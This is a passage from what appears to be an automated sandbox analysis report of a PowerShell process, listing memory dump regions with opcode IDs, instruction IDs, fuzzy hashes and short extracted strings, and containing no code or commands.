                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                                                                                • Instruction ID: b27604377351a1b7199899e9f69856413cd517be59634d372aac8d7f056f168e
                                                                                                                                • Opcode Fuzzy Hash: 8f43806339079823913c42595ef0095caa709b2006b11a2edfda70f9f6c0ec6a
                                                                                                                                • Instruction Fuzzy Hash: 6CE0D862308395078B1681296C540AAAF674EC316032941B7E144CF642DD19580343E1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3175336fb1fbb6840cbfbcbd1ff301cf16314845d6c45a755f6a758c412ce8fb
                                                                                                                                • Instruction ID: 7c1612b9c6394d93e66be5230a58f5df326abc61b22813df55ea78c5fddaf750
                                                                                                                                • Opcode Fuzzy Hash: 3175336fb1fbb6840cbfbcbd1ff301cf16314845d6c45a755f6a758c412ce8fb
                                                                                                                                • Instruction Fuzzy Hash: DAD012A271211927555871B92C807FBA6CF8AC44A47090176DB05C7641FF60EC1703E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 512809ac3ed521d89c9f48e5223db262cc12307084a94a97c9d544d7b6f4ac09
                                                                                                                                • Instruction ID: f2747e5a15eb596633e826524f1f84d80048d2758d27f4fe052420824646e039
                                                                                                                                • Opcode Fuzzy Hash: 512809ac3ed521d89c9f48e5223db262cc12307084a94a97c9d544d7b6f4ac09
                                                                                                                                • Instruction Fuzzy Hash: 16F06D709003044BD7649FB8D89D39ABBE5FB44324F004469D60ED3340DB3968818B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bb67b767fa35f07ce94b894fef7d84f07ad7edb4b493f45ab1ae25ad8ec4c09e
                                                                                                                                • Instruction ID: cc3d62c9d32b6616e28d5f0a53b10c379d70dcaf40773cc811eb140de76ea1e8
                                                                                                                                • Opcode Fuzzy Hash: bb67b767fa35f07ce94b894fef7d84f07ad7edb4b493f45ab1ae25ad8ec4c09e
                                                                                                                                • Instruction Fuzzy Hash: EDE04F3570461457DB093775A81D3AE7B96ABC9729F04002AD60A87345CF796D0287D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 78a2ef523db6a7690e8e60536dc7c8cf5e305f4cbcc00507c7a46b8c07a3737f
                                                                                                                                • Instruction ID: 73c0025eeb19bedda09e3a8c71d47b628bcbd0f71f392a44c14a13312d24664b
                                                                                                                                • Opcode Fuzzy Hash: 78a2ef523db6a7690e8e60536dc7c8cf5e305f4cbcc00507c7a46b8c07a3737f
                                                                                                                                • Instruction Fuzzy Hash: 4ED05E9271212927165470BA1C807FF96CF8AC44A47090176DB09C7281FF60FC1703E1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 110fb18a37943904b6abef285abbbad33cdfbb3d0b73a0c8faf02b21ce81ff73
                                                                                                                                • Instruction ID: 724bb0f8ddb8433606404abd2d7dc919c6507242d5439761c5ac4b11b51792ba
                                                                                                                                • Opcode Fuzzy Hash: 110fb18a37943904b6abef285abbbad33cdfbb3d0b73a0c8faf02b21ce81ff73
                                                                                                                                • Instruction Fuzzy Hash: 96E04F309041098BCB09BBB4E84A5FDBF70FF00311F500269DA4282580DE341A4BCEC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b839a95986c7b368018a4583de85eaadddcbd84be9ef4f6142cb3e1c5c572bd6
                                                                                                                                • Instruction ID: 9e74c92e6d3bcc55df65172f268ba16874bd9c257256ddefef8df608cdb090fe
                                                                                                                                • Opcode Fuzzy Hash: b839a95986c7b368018a4583de85eaadddcbd84be9ef4f6142cb3e1c5c572bd6
                                                                                                                                • Instruction Fuzzy Hash: F5E08C31300A14178615662EB8209AF77DADFC8675310452AE10A97340DF64EC068BA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction ID: 14277df882fb366a70dea0ba5b967635183e628477b3720b60e0eac8fc635a8e
                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction Fuzzy Hash: DAE08631B00014978B08D699E8514E9F7A5DBCC220F04847EDA0AA7341DB32691687A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 688f67b1f0055f02d1b4306e782d27e70cc63865c775c8be05fd01dc58a55765
                                                                                                                                • Instruction ID: a2d652099a5fc27f60f9c169a61d11f8ad26167a5b6a774d3d119e49d054022e
                                                                                                                                • Opcode Fuzzy Hash: 688f67b1f0055f02d1b4306e782d27e70cc63865c775c8be05fd01dc58a55765
                                                                                                                                • Instruction Fuzzy Hash: DDE04F74A0830A8BCB14DBA4E48AAAABFF4AB44308F104169ED4597741EB309C81DB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4847cbddd7a2665c9f4f4040b56aa42b17b46f6a3c68bb98d75593a15f641f7e
                                                                                                                                • Instruction ID: 022ecaebf7211b14c42e337854c583976f2fb764be24be448c125c147b39615c
                                                                                                                                • Opcode Fuzzy Hash: 4847cbddd7a2665c9f4f4040b56aa42b17b46f6a3c68bb98d75593a15f641f7e
                                                                                                                                • Instruction Fuzzy Hash: 44E01A70D04209AFC780DFA8CC8255ABBF4AB49200B5085AED908EB201E73196428BE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction ID: 4df228597ca88647b6b6760ac8e178988ffc93aa200ba03b1e23ff9882538732
                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction Fuzzy Hash: 3DD067B0D042099F8784EFADC94156EFBF4EB48200F6085AA8919E7301F7729A12CBD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c25c7dc7d9cd9bd22e3dcc5393aba149fe366ceb7f395840993da99215b3326
                                                                                                                                • Instruction ID: 76397a64ea082b7cfb6530d5ee9000303cac636878bca5e28dbbd63f80ca7727
                                                                                                                                • Opcode Fuzzy Hash: 6c25c7dc7d9cd9bd22e3dcc5393aba149fe366ceb7f395840993da99215b3326
                                                                                                                                • Instruction Fuzzy Hash: AAD067319041098BCB08BBA5E85B5BDBB74FA14311F404169DA0792590EF352A5ACAC5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c35bfed3b35f75ee94f3d06cc857bd24250e88aab71965120ad4d1b36ceae00
                                                                                                                                • Instruction ID: ae139bc4588ef1ea135d5c5f89eb1826ea6995ed6c2cc793f552682d1d492d18
                                                                                                                                • Opcode Fuzzy Hash: 6c35bfed3b35f75ee94f3d06cc857bd24250e88aab71965120ad4d1b36ceae00
                                                                                                                                • Instruction Fuzzy Hash: F6D01734A0830A8BCB18EFA4E84A96EBBB4BB44300F00416AEE0993340EB306C01CBC1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 835a002fb21628a82e0c6a832c92e023cee5c6ee51edbe94d5d996f42f2526f4
                                                                                                                                • Instruction ID: 0f6a19c623f6620df28df92796d9cfb87a926d2ffa4241b65d43aa4fcf17511d
                                                                                                                                • Opcode Fuzzy Hash: 835a002fb21628a82e0c6a832c92e023cee5c6ee51edbe94d5d996f42f2526f4
                                                                                                                                • Instruction Fuzzy Hash: 59D0223000C3C44FC3439B3498100603F28FE4712A32524CEE94E4B1E3CA26A84ACB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d1e5efbeea6ff83dbb8cf65fe54fda470054020ee53aa452ac43bb23450f7375
                                                                                                                                • Instruction ID: c19ba09be81c1ab9986c7f33aa6b6d14f0df8aa5c046d80394361a40817caf34
                                                                                                                                • Opcode Fuzzy Hash: d1e5efbeea6ff83dbb8cf65fe54fda470054020ee53aa452ac43bb23450f7375
                                                                                                                                • Instruction Fuzzy Hash: 7FC08C1180D2C00EEF0783358E660007F729E4350830A01C2C98397123CD188822C341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ac02a23d996261951a34695f47c36af6beeef9047539b5ef92584ddf2847bef5
                                                                                                                                • Instruction ID: 70e1b0383df9c055f8f56d561d6eff6b41971f440acf738b68575a3090d6dcfa
                                                                                                                                • Opcode Fuzzy Hash: ac02a23d996261951a34695f47c36af6beeef9047539b5ef92584ddf2847bef5
                                                                                                                                • Instruction Fuzzy Hash: 14B092340447088FC298AF7AA4048147329EF4921938008ECEA0E0B2938E37E889CA45
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$84ll$84ll$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-3941682436
                                                                                                                                • Opcode ID: f1840f5808f26855bf985d448cdc767edd51556f8f0cf245e4b3ada49d481cbf
                                                                                                                                • Instruction ID: 8b3710ba1c06292a9254dc7951f1c45f03e94842e45d4a6100e360a4b96cdbdf
                                                                                                                                • Opcode Fuzzy Hash: f1840f5808f26855bf985d448cdc767edd51556f8f0cf245e4b3ada49d481cbf
                                                                                                                                • Instruction Fuzzy Hash: 5DB1F4F061420EDFDB55CF68C940AAE7BF6EF85300F24856AE8119B292CB75DC51CBA1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $cak$4']q$4']q$84ll$84ll$tP]q$tP]q$Jol$Jol$Jol$Jol$Jol
                                                                                                                                • API String ID: 0-1772102648
                                                                                                                                • Opcode ID: 092740ed2b3a9356612421e1a764445d8a18fb5737554d8f5bfaa06d4673461d
                                                                                                                                • Instruction ID: 01b96ffafeed457e12230e28da90c60c6c15d8b5de4c631035dd9417c64f42fe
                                                                                                                                • Opcode Fuzzy Hash: 092740ed2b3a9356612421e1a764445d8a18fb5737554d8f5bfaa06d4673461d
                                                                                                                                • Instruction Fuzzy Hash: 125118B1B0430A8FD765CB58855066FBBEAAF81710F28866FD515CF657C731C842C3A5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$dl$dl
                                                                                                                                • API String ID: 0-110020175
                                                                                                                                • Opcode ID: 13075b5e864ee7beed2c295a9284214ed87cad61683b0f7a23ed9ea42cb8983d
                                                                                                                                • Instruction ID: fc12d77604d4c81c9508d06e5137f2f40cda3b1428bd79255b236c69d3e3fe67
                                                                                                                                • Opcode Fuzzy Hash: 13075b5e864ee7beed2c295a9284214ed87cad61683b0f7a23ed9ea42cb8983d
                                                                                                                                • Instruction Fuzzy Hash: 478166B13283458FC755CB68941066EFBF5EF86210F18C2AFD545CB2A2CA31C845C7A3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$$]q$$]q$$]q$dl$dl
                                                                                                                                • API String ID: 0-3659981593
                                                                                                                                • Opcode ID: 20db3cb904eec6abeb8720c78fa7b84466c24b2f030f5a026b71d1aee93de21c
                                                                                                                                • Instruction ID: 0f31e8980673996113b86dd7b9ce14875b4985be955a7279ae2ac5e883ff29e7
                                                                                                                                • Opcode Fuzzy Hash: 20db3cb904eec6abeb8720c78fa7b84466c24b2f030f5a026b71d1aee93de21c
                                                                                                                                • Instruction Fuzzy Hash: FE5164B17243069FCB64DB69890126EFBE6AFC2610F24C66FD445CB291DA31C849C7A3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: pi6k$pi6k$pi6k$pi6k$Jol$Jol$Jol
                                                                                                                                • API String ID: 0-470287443
                                                                                                                                • Opcode ID: 0383ee945d13b3931dabbb222dc6c7d0a1a663630ffe2a3054180366dd4c846c
                                                                                                                                • Instruction ID: ea730b21df9ea68ad26b44b7e84d617e07961062a292e8031bac6fbf19079be1
                                                                                                                                • Opcode Fuzzy Hash: 0383ee945d13b3931dabbb222dc6c7d0a1a663630ffe2a3054180366dd4c846c
                                                                                                                                • Instruction Fuzzy Hash: 4C4179B5700206DFCB50DF6885402AEBBE6FF85310F04867EE8218FA91DA75CD41CBA2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tMnl$`^q$`^q$`^q$`^q
                                                                                                                                • API String ID: 0-3010539823
                                                                                                                                • Opcode ID: b939798f0496b43d3a78788f09967f334acd15f2039cdd24371103b0bd7655f1
                                                                                                                                • Instruction ID: c670e0cabcc78d404acc24f1b871ac0a646d3729a3f6f5583d2eb61f7a72b3e1
                                                                                                                                • Opcode Fuzzy Hash: b939798f0496b43d3a78788f09967f334acd15f2039cdd24371103b0bd7655f1
                                                                                                                                • Instruction Fuzzy Hash: 5CB1B774E002099FDB54DFA9D990A9DFBF6FF88304F10862AD819AB355DB34A905CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tMnl$`^q$`^q$`^q$`^q
                                                                                                                                • API String ID: 0-3010539823
                                                                                                                                • Opcode ID: d9d7664064dfd21784541a64efd14f27b83a720651fe13c76b5e996b4f5083f2
                                                                                                                                • Instruction ID: b42df6d6eaca9902bd0ca3b67489ead6787575ff69b41509692a3b7e54fbf9c3
                                                                                                                                • Opcode Fuzzy Hash: d9d7664064dfd21784541a64efd14f27b83a720651fe13c76b5e996b4f5083f2
                                                                                                                                • Instruction Fuzzy Hash: CDB1B774E002099FDB54DFA9D990A9DFBF6FF88304F108629D819AB355DB34A905CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2317651978.00000000041F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_41f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tMnl$`^q$`^q$`^q$`^q
                                                                                                                                • API String ID: 0-3010539823
                                                                                                                                • Opcode ID: 794708a956c419328d2249e9eccc3545b735aef69729edfa59b468b674a621c6
                                                                                                                                • Instruction ID: 585377dd528c1a78fa8ec0d0d732caa3fd8886bcc82be0083c7e2ced58a629bf
                                                                                                                                • Opcode Fuzzy Hash: 794708a956c419328d2249e9eccc3545b735aef69729edfa59b468b674a621c6
                                                                                                                                • Instruction Fuzzy Hash: 5DB19674E0020A9FDB54DFA9D990A9DFBF6FF88304F108629D819AB354DB34A945CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$pi6k$rnl$rnl
                                                                                                                                • API String ID: 0-1275723643
                                                                                                                                • Opcode ID: e95dfc6531d48059a9e14e35873ae53b485e208276923e1e18a9388c654ab22f
                                                                                                                                • Instruction ID: 1d675812ca2f95741435ac039010a335cc1bcd2e3f6f784e62d2963700a10bfe
                                                                                                                                • Opcode Fuzzy Hash: e95dfc6531d48059a9e14e35873ae53b485e208276923e1e18a9388c654ab22f
                                                                                                                                • Instruction Fuzzy Hash: F16133F1B0420D8FCB65DB6894402AEBBF6EF86211F18866FD455CB25BDA318846CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$4']q$4']q$rnl$rnl
                                                                                                                                • API String ID: 0-3631458751
                                                                                                                                • Opcode ID: b046d4a9ef96f745e6f394bad9064f8199ebe6bdfbaa28407471ecf3f482aa51
                                                                                                                                • Instruction ID: c1c414ec785103262797e3594334bc6ba6ae5799fd3ae8faaa435f84863acb6f
                                                                                                                                • Opcode Fuzzy Hash: b046d4a9ef96f745e6f394bad9064f8199ebe6bdfbaa28407471ecf3f482aa51
                                                                                                                                • Instruction Fuzzy Hash: BB41D6B0B04346CFDB55DB68881066EBBF1EF86211F18C1AFD449CB252DB358D45C791
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$84ll$tP]q$Jol$Jol
                                                                                                                                • API String ID: 0-2233797684
                                                                                                                                • Opcode ID: 0a886d47b2b33ff9cbe873d3789a45923546551d1984f82e1d60ea2790c6d6fc
                                                                                                                                • Instruction ID: d30eedd9c6500239710fd9e9f2704d4e2f62249b0384b1e67f600b18cf068401
                                                                                                                                • Opcode Fuzzy Hash: 0a886d47b2b33ff9cbe873d3789a45923546551d1984f82e1d60ea2790c6d6fc
                                                                                                                                • Instruction Fuzzy Hash: 4131B1F1A0020ADBEB64CF448444A6EB7EAEF81710F2882AED6149F553C372D442C761
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$84ll$tP]q$Jol$Jol
                                                                                                                                • API String ID: 0-2233797684
                                                                                                                                • Opcode ID: ce9df06172511922de4773aa0e27356e12349b9ada466beeab98acd149b88a23
                                                                                                                                • Instruction ID: 4504504ce8c51359085ad1c5135c740ba18333b96ba85865ec8a88ee48b766e2
                                                                                                                                • Opcode Fuzzy Hash: ce9df06172511922de4773aa0e27356e12349b9ada466beeab98acd149b88a23
                                                                                                                                • Instruction Fuzzy Hash: 4C218FF1A0420ADBEB64CF448444B7EB7E6AF81711F2882AED6159B557C372D842C761
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$4']q$4']q
                                                                                                                                • API String ID: 0-1785108022
                                                                                                                                • Opcode ID: 6b44fe90d00806c7c8339af5090d65aead9474c0bc398258d80cfbf4ea49a285
                                                                                                                                • Instruction ID: d5504af275a78d33e8a2afa97205052fa0f8e084d063df7a7099965b1bf0fb75
                                                                                                                                • Opcode Fuzzy Hash: 6b44fe90d00806c7c8339af5090d65aead9474c0bc398258d80cfbf4ea49a285
                                                                                                                                • Instruction Fuzzy Hash: DFA178B5B043068FCB68DB68885526EBBE69FC5200F34866FD411CF255DB32E861C7A2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: 228537193f299a99d7af854626bd853a3c230e22a58762d23e570e90a58b8ba5
                                                                                                                                • Instruction ID: d659a39e679b741e1cc15ad8ab992a6e89f72325ad4bb6b63d952c5a96660e5f
                                                                                                                                • Opcode Fuzzy Hash: 228537193f299a99d7af854626bd853a3c230e22a58762d23e570e90a58b8ba5
                                                                                                                                • Instruction Fuzzy Hash: 652187B93142029BDB64DB7E9D01B3FB7D6AFC0710F34862EA906DB281DD76E8548361
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$Jol$Jol
                                                                                                                                • API String ID: 0-3612309805
                                                                                                                                • Opcode ID: 3043ac254715c579ce3ecd99e56c0fc8b89f1ebbd3366a01ba30a449f2ea281e
                                                                                                                                • Instruction ID: 54fe5dede9a6c72c72a6638d67937a5315dc9bfc6cd1ee30d7c25d6fbbb10c81
                                                                                                                                • Opcode Fuzzy Hash: 3043ac254715c579ce3ecd99e56c0fc8b89f1ebbd3366a01ba30a449f2ea281e
